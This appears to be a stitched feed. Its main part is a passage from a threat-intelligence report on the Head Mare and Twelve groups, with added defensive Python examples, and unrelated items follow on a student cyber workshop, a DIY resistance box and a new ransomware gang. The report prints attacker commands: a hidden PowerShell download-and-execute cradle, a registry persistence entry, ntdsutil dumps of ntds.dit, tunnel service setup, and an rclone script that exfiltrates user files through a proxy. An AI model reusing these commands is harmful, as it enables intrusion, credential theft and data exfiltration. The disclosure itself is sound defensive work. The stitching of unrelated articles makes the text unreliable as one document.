If the -p flag is specified in the command line, a service for the Gost tool will be installed on the system. The following function is used for this:
function Setup-Gost-Service {
# Set port
[xml]$winswxml = Get-Content $winswxmlPath
$winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p
$winswxml.Save($winswxmlPath)
Write-Host "

Port number updated to $port in $winswxmlPath"

# Service install
Write-Host "

Installing gost as service"
Start-Process $winswPath -ArgumentList "install" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "start" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the Gost executable file as a service and passes necessary settings to it.

If -t key is passed to the script, it installs and configures cloudflared in the system.
function Setup-Cloudflared-Service {

# Service install
Write-Host "

Installing cloudflared as service"
Start-Process $cloudflaredPath -ArgumentList "service install $t" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the cloudflared service and passes settings to it by means of the command line.

In addition to installing and configuring tunneling tools, the script has the ability to remove the artifacts they leave behind. The script can also stop and uninstall the cloudflared and Gost services, if the -u parameter is passed to it when it launches.
if ($u) {
Write-Host "

Uninstalling gost"
Start-Process sc.exe -ArgumentList "stop winsw" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "uninstall" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output

Write-Host "

Uninstalling cloudflared"
Start-Process sc.exe -ArgumentList "stop winuac" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $cloudflaredPath -ArgumentList "service uninstall" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output

$filePaths = @(
"C:\Windows\System32\winsws.wrapper.log",
"C:\Windows\System32\winsws.err.log",
"C:\Windows\System32\winsws.out.log",
"C:\Windows\System32\winsws.xml",
"C:\Windows\System32\winsws.exe",
"C:\Windows\System32\winsw.exe",
"C:\Windows\System32\winuac.exe"
)
foreach ($filePath in $filePaths) {
if (Test-Path $filePath) {
Remove-Item -Path $filePath -Force
Write-Output "

Deleted: $filePath"
} else {
Write-Output " File not found: $filePath"
}
}
}
After deleting the services, the script deletes executables, configuration files, and logs of the tools.

In one incident, the attackers downloaded cloudflared and Gost from the server 45[.]156[.]21[.]148, which we previously saw in Head Mare attacks. An example download link is:
hxxp://45[.]156[.]21[.]148:8443/winuac.exe
Besides cloudflared and Gost, the attackers used cloud tunnels like ngrok and Localtonet. Localtonet is a reverse proxy server providing internet access to local services. The attackers launched it as a service using NSSM, downloading both tools from the official Localtonet website (localtonet[.]com).
hxxp://localtonet[.]com/nssm-2.24.zip
hxxp://localtonet[.]com/download/localtonet-win-64.zip
After downloading, they extracted the tools and launched them with these parameters:
nssm.exe install Win32_Serv
localtonet.exe authtoken <token>
These commands allow installing Localtonet as a service and authorizing it with a token for configuration.

Reconnaissance


The attackers used common system reconnaissance tools like quser.exe, tasklist.exe, and netstat.exe on local hosts. They primarily used fscan and SoftPerfect Network Scanner for local network reconnaissance, along with ADRecon, a tool for gathering information from Active Directory. ADRecon is a PowerShell script not previously observed in the group’s arsenal.

The attackers also used ADRecon to study the Active Directory domain, including computers, accounts, groups, and trust relationships between domains. The command history showed various domains passed as arguments to the script:
.\ADRecon.ps1 -DomainController <FQDN A>
.\ADRecon.ps1 -DomainController <FQDN B>
.\ADRecon.ps1 -DomainController <FQDN C>
<..>

Privilege Escalation


The attackers exploited previously compromised accounts of victims and their contractors, and created privileged local accounts, particularly when exploiting the business automation software server. If a user has sufficient permissions to remotely execute commands on the server, this software allows running a child command prompt process, such as cmd.exe, with privileges in the operating system corresponding to the program’s privileges. Since business automation software typically has administrator privileges in the OS, the child process also becomes privileged. The attackers exploited this opportunity: after gaining access to the vulnerable software server, they created a privileged local account on whose behalf they launched a command interpreter.

Command Execution


The attackers launched the Windows command interpreter on the business automation platform server in the target system within a process that executed the following command line:
cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object
Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt
This command downloads and executes the vivo.txt file, which we were unable to obtain. However, based on system events, we suspect that it opened a reverse shell, which the operator used to create two files in the target system.
c:\programdata\microsoftdrive\mcdrive.vbs
c:\programdata\microsoftdrive\mcdrive.ps1
Then, using reg.exe, the attackers added an autorun entry to execute mcdrive.vbs with the interpreter wscript.exe.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t
REG_EXPAND_SZ /d "wscript.exe \"$appdata\MicrosoftDrive\mcdrive.vbs
The VBS file is an obfuscated Visual Basic script that creates an ActiveX object reference named WScript.Shell and uses its Run() function to execute an obfuscated command line.

A deobfuscated command line snippet follows:
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -
NonInteractive -NoProfile -w hidden -c iex
([System.IO.File]::ReadAllText('C:\ProgramData\MicrosoftDrive\mcdrive.ps1'))
This command reads and executes the C:\ProgramData\MicrosoftDrive\mcdrive.ps1 file through the PowerShell interpreter. This file is a CobInt loader, previously seen only in Twelve’s arsenal. The mcdrive.ps1 snippet below determines the operating system’s bitness, decrypts, and executes the payload, which initiates a request to a C2 server at 360nvidia[.]com. The image below shows a graph obtained from analysis in the Cloud Sandbox on our Threat Intelligence Portal.

Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com
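To triage a Run-key autorun such as mcdrivesvc, a responder usually starts from reg query output or a registry export. The following added example in Python, not code from the report, parses the text format of reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (one value per line: name, type and data separated by four spaces) and flags values that are launched through a script host, point at a script file, reference a user-writable directory, or carry the hidden-window and execution-policy-bypass PowerShell switches seen in the deobfuscated command above. The sample query output is constructed; only the mcdrivesvc value mirrors the report.

```python
"""Triage of Run-key autoruns like the mcdrivesvc entry described above.

Added example, not code from the Securelist report. The reg query output
below is constructed; the mcdrivesvc value mirrors the report's entry.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_FILE_RE = re.compile(r"\.(?:vbs|vbe|js|jse|ps1|hta|bat|cmd)\b")
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\public\\", "\\temp\\")
PS_EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-(?:ep|ex|executionpolicy)\s+bypass|\biex\b|downloadstring"
)
# reg query prints each value as: 4 spaces, name, 4 spaces, REG_type, 4 spaces, data
VALUE_RE = re.compile(r"^\s{4}(.+?)\s{4}(REG_[A-Z_]+)\s{4}(.*)$")


def launcher_of(data: str) -> str:
    """Basename of the first executable in a Run value (quoted or bare)."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', data)
    first = (m.group(1) or m.group(2)) if m else ""
    return PureWindowsPath(first).name.lower()


def classify(data: str) -> List[str]:
    """Return the list of reasons a Run value deserves a closer look."""
    low = data.lower()
    reasons = []
    host = launcher_of(low)
    if host in SCRIPT_HOSTS:
        reasons.append(f"launched through script host {host}")
    if SCRIPT_FILE_RE.search(low):
        reasons.append("runs a script file rather than a binary")
    if any(d in low for d in USER_WRITABLE):
        reasons.append("references a user-writable directory")
    if PS_EVASION_RE.search(low):
        reasons.append("hidden window, execution-policy bypass or download cradle")
    return reasons


def parse_reg_query(text: str) -> List[Dict[str, str]]:
    """Parse reg query output into {key, name, type, data} records."""
    entries, key = [], ""
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m:
            entries.append({"key": key, "name": m.group(1), "type": m.group(2), "data": m.group(3)})
    return entries


def find_suspicious_autoruns(text: str) -> List[Dict[str, object]]:
    out = []
    for entry in parse_reg_query(text):
        reasons = classify(entry["data"])
        if reasons:
            out.append({**entry, "reasons": reasons})
    return out


# Constructed reg query output; two benign values and the report's autorun.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    mcdrivesvc    REG_EXPAND_SZ    wscript.exe "C:\Users\alice\AppData\Roaming\MicrosoftDrive\mcdrive.vbs"
"""

if __name__ == "__main__":
    for hit in find_suspicious_autoruns(SAMPLE_REG_QUERY):
        print(hit["name"], "->", "; ".join(hit["reasons"]))
```

The check deliberately scores several weak signals rather than one strong one: a script host alone is common in admin logon scripts, but a script host launching a .vbs from AppData, as here, is the combination worth pulling for analysis.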

Credential Access


The investigation identified tools for obtaining credentials. Besides the publicly available mimikatz utility, the attackers used secretsdump and ProcDump. Secretsdump was found on one victim’s system at the following paths:
[USERNAME]\Desktop\secretsdump.exe
[USERNAME]\Desktop\secretsdump (1).exe
A new Go-based sample named update.exe was also discovered, enabling the dumping of the ntds.dit file and the SYSTEM and SECURITY registry hives using ntdsutil.exe.
powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q
Additionally, manual PowerShell commands were observed for dumping data from these locations.
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp1' q q
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
While no traces of the first command’s successful execution were found, the results of the second one were located at the following paths:
\temp\Active Directory
\temp\registry
\temp\Active Directory\ntds.dit
\temp\Active Directory\ntds.jfm
\temp\registry\SECURITY
\temp\registry\SYSTEM
\temp\[REDACTED].zip

Lateral Movement


The attackers used RDP to connect to systems, including with privileged accounts. They connected to NAS servers via SSH and used tools like mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication.

Data Collection and Exfiltration


Another new tool in Head Mare’s arsenal was a script running wusa.exe. Normally, this file name belongs to the legitimate Windows Update Standalone Installer. However, the script’s launch parameters indicated that the file was actually the rclone.exe utility. Rclone is an open-source project for copying and synchronizing files between different types of storage, making it convenient for data transfer.
@echo off
setlocal enabledelayedexpansion
set inputFile=C:\ProgramData\1.txt
for /f "tokens=*" %%A in (%inputFile%) do (
set hostname=%%A
start /wait "" C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" --sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\\%%A\C$\Users" sftpP:/data/<path> -q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" --include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" --include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G
)
endlocal
The script starts by taking the file 1.txt as input, which contains a list of hosts. For each host, it runs rclone.exe to transfer files from the device to an SFTP server through a SOCKS proxy. The attackers only exfiltrated files from specific directories or files matching the extension templates specified in the script.
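During incident response the question this batch script raises is which files actually left the estate. The added example below, written in Python and not taken from the report, parses the rclone command line recorded for wusa.exe, extracts the proxy endpoint, source share, destination remote and --include filters, and replays rclone's filter semantics against a constructed file listing to enumerate what would have been transferred. It assumes rclone's documented glob rules (a single * does not cross /, ** does, a pattern without a leading / matches at any path-segment boundary), --max-age y = 365 days and --max-size G = 1024^3 bytes; the hostname WS01, the file listing and the proxy credentials are constructed.

```python
"""Scoping what an rclone exfiltration job like the one above would have taken.

Added example, not code from the Securelist report. Assumed rclone
semantics: '*' does not cross '/', '**' does, patterns without a leading
'/' match at any path-segment boundary, --max-age 'y' = 365 days,
--max-size 'G' = 1024**3 bytes. Hostname, file listing and credentials
in the sample are constructed.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

VALUE_FLAGS = {"config", "sftp-socks-proxy", "include", "exclude", "filter",
               "max-age", "max-size", "transfers", "multi-thread-streams"}
RCLONE_VERBS = {"sync", "copy", "move", "copyto", "moveto"}
AGE_DAYS = {"d": 1, "w": 7, "M": 30, "y": 365}
SIZE_MULT = {"": 1, "k": 1024, "M": 1024 ** 2, "G": 1024 ** 3, "T": 1024 ** 4}


def unquote(tok: str) -> str:
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok


def parse_rclone_cmdline(cmdline: str) -> Dict[str, object]:
    """Split a Windows command line into rclone subcommand, paths, flags and includes."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    includes: List[str] = []
    flags: Dict[str, object] = {}
    positional: List[str] = []
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--"):
            if "=" in tok:                                   # --config="path"
                key, val = tok[2:].split("=", 1)
                val = unquote(val)
            elif tok[2:] in VALUE_FLAGS and i + 1 < len(tokens):  # --include "*.doc"
                key, val = tok[2:], unquote(tokens[i + 1])
                i += 1
            else:                                            # --ignore-existing
                key, val = tok[2:], True
            if key == "include":
                includes.append(str(val))
            else:
                flags[key] = val
        elif tok.startswith("-"):                            # -q
            flags[tok[1:]] = True
        else:
            positional.append(unquote(tok))
        i += 1
    proxy = flags.get("sftp-socks-proxy")
    m = re.match(r"^(?:([^:@]+):([^@]*)@)?([^:/]+):(\d+)$", proxy) if isinstance(proxy, str) else None
    binary = unquote(tokens[0])
    subcommand = positional[0] if positional else None
    return {
        "binary": binary,
        "subcommand": subcommand,
        "source": positional[1] if len(positional) > 1 else None,
        "destination": positional[2] if len(positional) > 2 else None,
        "includes": includes,
        "flags": flags,
        "proxy_host": m.group(3) if m else None,
        "proxy_port": int(m.group(4)) if m else None,
        "proxy_has_credentials": bool(m and m.group(1)),
        # rclone verbs issued by a binary not named rclone.exe: the wusa.exe disguise
        "masquerade": PureWindowsPath(binary).name.lower() != "rclone.exe" and subcommand in RCLONE_VERBS,
    }


def rclone_glob_to_regex(pattern: str) -> "re.Pattern[str]":
    anchored = pattern.startswith("/")
    body, out, i = pattern.lstrip("/"), [], 0
    while i < len(body):
        if body.startswith("**", i):
            out.append(".*")
            i += 2
        elif body[i] == "*":
            out.append("[^/]*")
            i += 1
        elif body[i] == "?":
            out.append("[^/]")
            i += 1
        else:
            out.append(re.escape(body[i]))
            i += 1
    return re.compile(("^" if anchored else "(?:^|/)") + "".join(out) + "$")


def parse_max_age_days(text: str) -> float:
    m = re.fullmatch(r"(\d+(?:\.\d+)?)([dwMy])", text)
    if not m:
        raise ValueError(f"unsupported --max-age value {text!r}")
    return float(m.group(1)) * AGE_DAYS[m.group(2)]


def parse_size_bytes(text: str) -> int:
    m = re.fullmatch(r"(\d+(?:\.\d+)?)([kMGT]?)", text)
    if not m:
        raise ValueError(f"unsupported --max-size value {text!r}")
    return int(float(m.group(1)) * SIZE_MULT[m.group(2)])


def would_transfer(info: Dict[str, object], relpath: str, size_bytes: int, age_days: float) -> bool:
    """Apply --include, --max-age and --max-size to one file relative to the source root."""
    includes = [rclone_glob_to_regex(g) for g in info["includes"]]
    if includes and not any(r.search(relpath) for r in includes):
        return False
    flags = info["flags"]
    if "max-age" in flags and age_days > parse_max_age_days(str(flags["max-age"])):
        return False
    if "max-size" in flags and size_bytes > parse_size_bytes(str(flags["max-size"])):
        return False
    return True


def scope_exfiltration(cmdline: str, files: List[Tuple[str, int, float]]) -> List[str]:
    info = parse_rclone_cmdline(cmdline)
    return [path for path, size, age in files if would_transfer(info, path, size, age)]


# Constructed command line: the batch script above with %%A replaced by WS01
# and the proxy credentials replaced by placeholders.
SAMPLE_CMDLINE = (
    r'C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" '
    r'--sftp-socks-proxy user:REDACTED@64.7.198.109:80 sync "\\WS01\C$\Users" '
    r'sftpP:/data/<path> -q --ignore-existing --auto-confirm '
    r'--include "*.doc" --include "*.docx" --include "*Desktop/**" '
    r'--include "*Documents/**" --include "*Downloads/**" --include "*.pdf" '
    r'--include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" '
    r'--include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" '
    r'--include "*.jp*" --include "*.eml" --include "*.pst" '
    r'--multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G'
)

# Constructed listing relative to \\WS01\C$\Users: (path, size in bytes, age in days).
SAMPLE_FILES = [
    ("alice/Desktop/budget.xlsx", 40_000, 30),
    ("alice/Desktop/old.docx", 5_000, 5 * 365),
    ("alice/Downloads/setup.exe", 50_000_000, 10),
    ("alice/Pictures/holiday.png", 3_000_000, 200),
    ("alice/AppData/Local/Temp/cache.bin", 1_000, 1),
    ("alice/Videos/lecture.mp4", 3 * 1024 ** 3, 20),
    ("bob/Documents/notes.txt", 2_000, 400),
]

if __name__ == "__main__":
    for path in scope_exfiltration(SAMPLE_CMDLINE, SAMPLE_FILES):
        print("would be transferred:", path)
```

Note the setup.exe result: the directory filters (*Desktop/**, *Documents/**, *Downloads/**) pull every file under those folders regardless of extension, so scoping by extension alone understates what left.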

Final goal: file encryption


As in previous attacks, they encrypted data using variants of LockBit 3.0 (for Windows systems) and Babuk (for NAS devices). The investigation found that the LockBit file was initially saved on the victim’s host at the following paths:

  • C:\Users\{username}\Desktop\locker.exe;
  • C:\Windows\SYSVOL\Intel\locker.exe.

Below is a sample ransom note, with the cybercriminals’ contacts redacted:

Contents of a LockBit ransom note

Connection between Head Mare and Twelve


In addition to the aforementioned TTPs, we attribute these attacks to Head Mare based on the following characteristics:

  1. A previously seen IP address:
    • 45.156.21[.]148


  2. Malware:
    • PhantomJitter


Further details about these indicators can be found in the private report on the Threat Intelligence Portal: “HeadMare’s new PhantomJitter backdoor dropped in attacks exploiting Microsoft Exchange”.

However, the presence of Twelve’s tools like CobInt suggests collaboration. To test this hypothesis, activity cluster diagrams were created based on the Diamond Model framework. Overlaps – common elements in the tactics of both groups – are highlighted in red, indicating potential coordination.

Analysis of the Head Mare techniques and tools

In the image above, we see for the first time the use of the CobInt malware in Head Mare attacks. Previously, it was present only in the arsenal of the Twelve group, the analysis of which is presented below.

Analysis of the Twelve techniques and tools

Also, the analysis of the two models revealed overlaps in the infrastructure (C2s) of the groups. The following infrastructure elements appearing in Head Mare attacks were also present in a number of incidents related to the activities of the Twelve group.

  • 360nvidia[.]com;
  • 45.156.27[.]115

In addition, we have identified other similarities in the arsenal of the two groups:

  1. File names:
    • proxy.ps1
    • ad_without_dc.ps1


  2. Paths:
    • C:\Windows\System32\winsw.exe
    • C:\Windows\System32\winsws.exe
    • C:\Windows\System32\winuac.exe


  3. Service names:
    • winsw (Microsoft Windows Update)
    • winuac (Microsoft UAC Service Wrapper)


  4. Victims:
    • Manufacturing, government, energy


The final intersection points of the Head Mare and Twelve groups are shown in the image below. Given the overlaps in infrastructure, TTPs, CobInt malware, and victim choices, we assume that these groups act together, exchanging access to command-and-control servers and various tools for carrying out attacks.

Overlaps in TTPs, tools, and infrastructure between Head Mare and Twelve

Conclusion


Head Mare is actively expanding its set of techniques and tools. In recent attacks, they gained initial access to the target infrastructure by not only using phishing emails with exploits but also by compromising contractors.

They also use tools previously seen in attacks by other groups, such as Twelve’s CobInt backdoor.

This is not the only similarity between the two groups. In addition to the toolkit, the following were noticed:

  • Shared command-and-control servers: 360nvidia[.]com, 45.156.27[.]115
  • PowerShell scripts accessing these C2 servers: mcdrive.ps1
  • Scripts for tunneling network connections: proxy.ps1

Based on the factors described above, we assume that Head Mare is working with Twelve to launch attacks on state- and privately controlled companies in Russia. We will continue to monitor the activity of the attackers and share up-to-date information about their TTPs. More details about the hacktivists’ activities and their tools, such as PhantomJitter, can be found in the materials available to subscribers of our Threat Intelligence reports.

Indicators of compromise


Please note: the network addresses given in this section were valid at the time of publication but may become outdated in the future.

Hashes (MD5):

  • 6008E6C3DEAA08FB420D5EFD469590C6  ADRecon.ps1
  • 09BCFE1CCF2E199A92281AADE0F01CAF  calc.exe, c.exe
  • 70C964B9AEAC25BC97055030A1CFB58A  locker.exe
  • 87EECDCF34466A5945B475342ED6BCF2  mcdrive.vbs
  • E930B05EFE23891D19BC354A4209BE3E  mimikatz.exe
  • C21C5DD2C7FF2E4BADBED32D35C891E6  proxy.ps1
  • 96EC8798BBA011D5BE952E0E6398795D  secretsdump.exe, secretsdump (1).exe
  • D6B07E541563354DF9E57FC78014A1DC  update.exe

File paths:
C:\Windows\SYSVOL\Intel\locker.exe
C:\ProgramData\MicrosoftDrive\mcdrive.ps1
C:\ProgramData\MicrosoftDrive\mcdrive.vbs
C:\ProgramData\proxy.ps1
C:\ProgramData\wusa.exe
C:\Users\{USERNAME}\AppData\Roaming\1.bat
C:\Users\{USERNAME}\AppData\Roaming\Microsoft\Windows\Recent\mimikatz.lnk
C:\Users\{USERNAME}\AppData\Roaming\proxy.ps1
C:\Users\{USERNAME}\Desktop\Обработка.epf
C:\Users\{USERNAME}\Desktop\ad_without_dc.ps1
C:\Users\{USERNAME}\Desktop\ADRecon.ps1
C:\Users\{USERNAME}\Desktop\h.txt
C:\Users\{USERNAME}\Desktop\locker.exe
C:\Users\{USERNAME}\Desktop\mimikatz.exe
C:\Users\{USERNAME}\Desktop\mimikatz.log
C:\Users\{USERNAME}\Desktop\secretsdump (1).exe
C:\Users\{USERNAME}\Desktop\secretsdump.exe
C:\Users\{USERNAME}\Downloads\mimikatz-master.zip
C:\users\{USERNAME}\log.exe
C:\windows\adfs\ar\update.exe
C:\windows\system32\inetsrv\c.exe
C:\windows\system32\inetsrv\calc.exe
C:\windows\system32\winsw.exe
C:\Windows\System32\winsws.exe
C:\windows\system32\winuac.exe
C:\Windows\SYSVOL\Intel\mimikatz.exe

IP addresses and domain names:
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109
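The indicators above are published defanged, so the first step of any sweep is to refang them. The added example below, written in Python and not part of the report, refangs the list, separates IPs from domains, and then scans a handful of constructed proxy and DNS log lines for exact IP matches and for domain or subdomain matches. The indicator list is the report's own; the log lines are constructed.

```python
"""Refanging the indicators listed above and sweeping logs for them.

Added example, not code from the Securelist report. The indicator list is
the report's (defanged); the proxy and DNS log lines are constructed.
"""
import re
from typing import Dict, List, Set, Tuple

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")


def refang(text: str) -> str:
    """Undo the usual defanging: [.] and (.) -> ., [:] -> :, hxxp -> http."""
    text = text.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    return re.sub(r"hxxp", "http", text, flags=re.I)


def load_iocs(text: str) -> Dict[str, Set[str]]:
    """Split a defanged indicator list into IP and domain sets."""
    iocs: Dict[str, Set[str]] = {"ips": set(), "domains": set()}
    for line in text.splitlines():
        item = refang(line.strip()).lower()
        if not item:
            continue
        if IP_RE.fullmatch(item):
            iocs["ips"].add(item)
        elif DOMAIN_RE.fullmatch(item):
            iocs["domains"].add(item)
    return iocs


def observables(line: str) -> Tuple[Set[str], Set[str]]:
    """Extract IPv4 addresses and domain-like tokens from one log line."""
    low = refang(line).lower()
    return set(IP_RE.findall(low)), set(DOMAIN_RE.findall(low))


def match_logs(iocs: Dict[str, Set[str]], lines: List[str]) -> List[Tuple[int, Set[str]]]:
    """Return (line number, matched indicators) for every line that hits an IoC."""
    hits = []
    for number, line in enumerate(lines, start=1):
        ips, domains = observables(line)
        matched = ips & iocs["ips"]
        for d in domains:
            # exact domain, or a subdomain of a listed domain
            if d in iocs["domains"] or any(d.endswith("." + bad) for bad in iocs["domains"]):
                matched.add(d)
        if matched:
            hits.append((number, matched))
    return hits


# The report's network indicators, as published (defanged).
IOC_TEXT = """
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109
"""

# Constructed proxy and DNS log lines; the last two are benign controls
# (localtonet.com is the vendor's official site, not an indicator).
SAMPLE_LOGS = [
    "2024-09-12T10:14:03Z dns query ws01 A 360nvidia.com -> 45.156.27.115",
    "2024-09-12T10:15:44Z proxy CONNECT 45.87.246.34:443 from 10.0.0.15 status=200",
    "2024-09-12T10:16:02Z proxy GET http://web-telegram.uk/vivo.txt from 10.0.0.22 status=200",
    "2024-09-12T10:17:30Z dns query ws02 A update.microsoft.com -> 198.51.100.7",
    "2024-09-12T10:18:10Z proxy GET http://localtonet.com/nssm-2.24.zip from 10.0.0.15 status=200",
]

if __name__ == "__main__":
    for number, matched in match_logs(load_iocs(IOC_TEXT), SAMPLE_LOGS):
        print(number, sorted(matched))
```

The localtonet.com line is left unmatched on purpose: the download itself is legitimate traffic, and a detection for it belongs in a behavioural rule (NSSM and Localtonet fetched by a server that never did so before) rather than in an indicator list.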


securelist.com/head-mare-twelv…


Students, Ready for the RHC Conference Workshops? Let's Explore Deepfakes, AI, the Dark Web, Ethical Hacking, Doxing and Cyberbullying Together


On Thursday 8 May, the Red Hot Cyber Conference 2025 will host an entire day dedicated to young people with Hands-on Workshops (organized in collaboration with Accenture Italia). It is a unique, free opportunity to immerse yourself in the world of cybersecurity and technology in a practical, interactive way. Given the crowd that packed the conference during last year's workshops, this year the workshops will be held inside the theater, which offers 800 seats.

The event will take place in Rome at the Teatro Italia, with reception starting at 11:00 so that school groups arriving from outside Rome have time to reach the venue. The Teatro Italia is only a 20-minute walk from Termini station and a 6-minute walk from the Piazza Bologna stop on Metro line B (about 600 meters).

The workshops start at 11:30. This day is dedicated to all middle school, high school and university students, or simply to anyone curious who wants to dive into technology and information security in a practical, interactive and engaging way.

Free registration for the Workshops on Thursday 8 May

How we will do it


Not just words, but direct experience! Through immersive technical sessions, participants will have the opportunity to experience first-hand how ethical hackers test a website's vulnerabilities, how artificial intelligence can be used to recognize objects or analyze deepfakes, and how to tackle specific cybersecurity problems. They will also explore the Dark Web safely, learning the importance of Open Source Intelligence (OSINT) and Cyber Threat Intelligence, and discuss doxing and cyberbullying.

This initiative will be “hands-on”. In computing, the expression “hands-on” refers to a practical, concrete approach to learning or carrying out specific tasks. It implies actually manipulating, experimenting with or applying knowledge and skills in a practical context rather than settling for a theoretical or abstract understanding.

We invite you to bring your laptop with whatever operating system you prefer, so you can actively take part in the exercises alongside our experts. If you miss a step, no problem: all workshops will be recorded and made available on our YouTube channel, so you can rewatch them whenever you want, just as in previous years.

Free registration for the Workshops on Thursday 8 May: http://rhc-conference-2025-workshop.eventbrite.it/
“Hands-on” workshops of 2024 at the Red Hot Cyber Conference 2024

An Interactive, Practical Experience


The goal will therefore not be merely “passive” but above all “active”, letting young people get their hands on something they have always seen in films and thought unreachable, sparking in their eager minds an interest in subjects that nobody has ever let them try up close.

Unlike previous editions, the workshops will be concentrated exclusively on 8 May and will give participants the chance to get hands-on with the most innovative technologies through several practical sessions.

Bring your laptop! In some of these workshops you will be able to get to work right away and try out in practice what you have learned, guided by industry experts.

Program of the Day


Below is the detailed program of the workshops taking place on Thursday 8 May (which you can also find in the full conference program):

Why Participate?


  • Practical experience: not just theory, but concrete exercises to improve your skills.
  • Industry experts: sessions led by highly qualified professionals.
  • Unique insights: crucial topics such as ethical hacking, privacy, artificial intelligence and cyberbullying.
  • Networking: an opportunity to connect with other cybersecurity enthusiasts.

Register Now!


Entry to the Hands-on Workshops requires a registration separate from the conference. Book your place here: rhc-conference-2025-workshop.e…

Don't miss this chance to learn, experiment and test yourself in the world of cybersecurity! See you on Thursday 8 May in Rome!

The article Students, Ready for the RHC Conference Workshops? Let's Explore Deepfakes, AI, the Dark Web, Ethical Hacking, Doxing and Cyberbullying Together originally appeared on Red Hot Cyber, the information security blog.


A Decade Resistance Box From PCBs


One of those useful things to have around on your bench is a decade resistance box, essentially a dial-a-resistance instrument. They used to be quite expensive in line with the cost of close-tolerance resistors, but the prices have come down and it’s within reach to build your own. Electronic design consultancy Dekimo have a nice design for one made from a series of PCBs which they normally give out at trade fairs, but now they’ve released the files for download.

It’s released as Gerbers and BOM with a pick-and-place file only, and there’s no licence so it’s free-as-in-beer, but that should be enough if you fancy a go. Our Gerber viewer is playing up so we’re not entirely sure how reliable using PCBs as wafer switches will be long-term, but since the pictures are all ENIG boards we’d guess the gold plating will be much better than the HASL on all those cheap multimeters.

We like this as a conference giveaway; being used to badges, it’s refreshing to see a passive take on PCB artwork. Meanwhile this isn’t the first resistance box we’ve seen with unconventional switches.


hackaday.com/2025/03/13/a-deca…


NightSpire Arrives! A New Actor in the Ransomware Landscape


During the reconnaissance of the underground and of criminal groups carried out by Red Hot Cyber's DarkLab threat intelligence laboratory, we came across the Data Leak Site of a cyber gang never monitored before: NightSpire.

This is a new ransomware group that appears to have recently emerged on the cybercrime scene. Although there is no prior information on this actor, analysis of their data leak site (DLS) and of their communications provides some key clues about their strategy and operating methods.

The group describes itself as an unstoppable threat to companies and promises to exploit every vulnerability to its advantage. Below we analyze the details of their portal and the possible implications of their activity.

NightSpire: Identity and Public Statements


The “About” section of the NightSpire site contains an intimidating message, typical of ransomware groups seeking to spread fear among companies. The language used recalls that of well-known actors such as BlackCat, LockBit and Conti, underlining their intention to hit vulnerable organizations and threaten them to obtain a ransom.

Text from the “About” section:
“NightSpire, the shadow architects of digital chaos, thrive on destroying the sanctity of corporate fortresses. With ruthless precision, we infiltrate the deepest data repositories, leaving no byte untouched. Fear us, for NightSpire is the harbinger of your downfall, the invisible hand that will exploit your every vulnerability until you kneel before our demands.”

